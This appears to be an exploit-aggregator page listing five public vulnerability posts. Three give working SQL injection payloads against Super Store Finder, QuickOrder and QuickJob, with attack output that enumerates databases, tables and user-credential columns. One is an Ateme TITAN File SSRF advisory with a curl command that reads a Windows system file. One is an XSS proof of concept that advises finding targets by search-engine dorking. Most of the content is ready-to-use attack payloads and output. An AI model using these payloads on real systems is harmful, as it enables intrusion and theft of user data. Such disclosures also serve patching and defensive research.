Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://codecanyon.net/item/super-store-finder/3630922 │ │ Vendor : Super Store Finder │ │ Software : Super Store Finder 3.6 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php --------------------------------------------------------------------------------- POST /products/superstorefinder/index.php HTTP/1.1 ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347[SQLI] --------------------------------------------------------------------------------- POST parameter 'products' is vulnerable to SQL Injection --- Parameter: products (POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)-- wXyW Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND 04872=4872-- wXyW Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z --- [+] Starting the Attack fetching current database current database: 'superstor_***' fetching tables [8 tables] +--------------+ | categories_b | | categories | | stores_c | | categories_c | | stores_b | | users_b | | users | | stores | +--------------+ fetching columns for table 'users' [11 columns] +-------------+ | id | | username | | password | | firstname | | lastname | | facebook_id | | address | | email | | created | | modified | | status | +-------------+ [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://quickorder.by-code.com │ │ Vendor : bylancer │ │ Software : QuickOrder 6.3.7 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /blog https://website/blog?s=[SQLI] GET parameter 's' is vulnerable to SQL Injection --- Parameter: s (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: s=1') OR 02445=2445 OR ('04586'='4586 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: s=1'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z --- [+] Starting the Attack fetching current database current database: 'quickordercode_**' fetching tables [39 tables] +-------------------------+ | qr_orders | | qr_order_items | | qr_blog_comment | | qr_payments | | qr_menu_variants | | qr_options | | qr_time_zones | | qr_countries | | qr_restaurant | | qr_blog_categories | | qr_logs | | qr_image_menu | | qr_balance | | qr_blog | | qr_menu | | qr_user | | qr_pages | | qr_menu_extras | | qr_taxes | | qr_upgrades | | qr_usergroups | | qr_faq_entries | | qr_transaction | | qr_restaurant_options | | qr_languages | | qr_admins | | qr_allergies | | qr_user_options | | qr_order_item_extras | | qr_subscriptions | | qr_menu_variant_options | | qr_plans | | qr_testimonials | | qr_plan_options | | qr_catagory_main | | qr_currencies | | qr_restaurant_view | | qr_waiter_call | | qr_blog_cat_relation | +-------------------------+ [-] Done </code></pre>

<pre><code> Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.9.12.4 3.9.11.0 3.9.9.2 3.9.8.0 Summary: TITAN File is a multi-codec/format video transcoding software, for mezzanine, STB and ABR VOD, PostProduction, Playout and Archive applications. TITAN File is based on ATEME 5th Generation STREAM compression engine and delivers the highest video quality at minimum bitrates with accelerated parallel processing. Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Titan File video transcoding software. The application parses user supplied data in the job callback url GET parameter. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP/DNS/File request to an arbitrary destination. This can be used by an external attacker for example to bypass firewalls and initiate a service, file and network enumeration on the internal network through the affected application. Tested on: Microsoft Windows NodeJS Ateme KFE Software Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5781 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php 22.04.2023 -- curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \ -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \ -H "User-Agent: sunee-mode" \ "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>" Call to file://C:\\windows\\system.ini returned 0 --- HTTP from Server ---------------- POST / HTTP/1.1 Host: ssrftest.zeroscience.mk Accept: */* Content-Type: application/xml Content-Length: 192 <?xml version='1.0' encoding='UTF-8' ?> <update> <id>0000</id> <name>dummy test job</name> <status>aborted</status> <progress>50</progress> <message>message</message> </update> </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://quickjob.bylancer.com │ │ Vendor : Bylancer │ │ Software : QuickJob 6.1 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /listing https://website/job-seekers?keywords=[SQLI]&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender=[SQLI] GET parameter 'keywords' is vulnerable to SQL Injection --- Parameter: keywords (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keywords=' AND 08186=8186 OR '04586'='4586&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender= Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: keywords='XOR(IF(now()=sysdate(),SLEEP(9),0))XOR'Z&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender= --- GET parameter 'gender' is vulnerable to SQL Injection --- Parameter: gender (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z --- [+] Starting the Attack fetching current database current database: 'quickjob_**' fetching tables [48 tables] +---------------------------+ | job_logs | | job_blog | | job_currencies | | job_user | | job_emailq | | job_custom_fields | | job_notification | | job_reviews | | job_testimonials | | job_user_applied | | job_countries | | job_product_resubmit | | job_category_translation | | job_favads | | job_experiences | | job_blog_categories | | job_faq_entries | | job_subadmin1 | | job_cities | | job_push_notification | | job_product | | job_upgrades | | job_catagory_sub | | job_messages | | job_catagory_main | | job_firebase_device_token | | job_time_zones | | job_blog_comment | | job_custom_options | | job_payments | | job_adsense | | job_blog_cat_relation | | job_languages | | job_custom_data | | job_pages | | job_companies | | job_balance | | job_login_attempts | | job_subscriptions | | job_fav_users | | job_admins | | job_resumes | | job_product_type | | job_salary_type | | job_transaction | | job_options | | job_usergroups | | job_subadmin2 | +---------------------------+ [-] Done </code></pre>

<pre><code>==================================================================================================================================== | # Title : virtual freer v1.57 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://sourceforge.net/projects/virtualfreer/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E [+] http://shopazcamultrair/direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>